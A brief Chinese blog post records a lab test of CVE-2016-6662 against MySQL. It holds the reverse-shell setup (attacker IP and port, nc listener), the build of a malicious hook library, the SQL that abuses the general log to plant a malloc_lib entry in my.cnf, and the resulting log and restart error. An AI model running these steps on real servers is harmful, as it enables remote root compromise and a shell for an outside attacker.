CVE-2016-6662 mysql RCE测试
参考:http://bobao.360.cn/learning/detail/3027.html ,我尝试第一种方法
1.先修改mysql_hookandroot_lib.c里面的反弹地址和端口:
#define ATTACKERS_IP "xx.x.x.x" #define SHELL_PORT 81
在攻击者机器上做好端口监听,等待反弹:
nc -lvv -p 81
2.编译库
gcc -Wall -fPIC -shared -o mysql_hookandroot_lib.so mysql_hookandroot_lib.c -ldl
3.执行命令:
mysql> set global general_log_file = '/etc/my.cnf'; mysql> set global general_log = on; mysql> select ' [mysqld] malloc_lib=/tmp/mysql/mysql_hookandroot_lib.so [separator] '; mysql> set global general_log = off;
4.可以发现my.cnf添加的内容
/usr/local/mysql/bin/mysqld, Version: 5.5.48-log (Source distribution). started with: Tcp port: 3306 Unix socket: /tmp/mysql.sock Time Id Command Argument 160914 17:45:16 1 Query select ' [mysqld] malloc_lib=/tmp/mysql/mysql_hookandroot_lib.so [separator] ' 160914 17:45:22 1 Query set global general_log = off
5 然后重启mysql,mysql重启会报错
leo@ubuntu:~$ sudo /etc/init.d/mysql restart [....] Restarting mysql (via systemctl): mysql.serviceJob for mysql.service failed because the control process exited with error code. See "systemctl status mysql.service" and "journalctl -xe" for details. failed!
--- --- --- --- From 小小leo 的博客 --- --- --- ---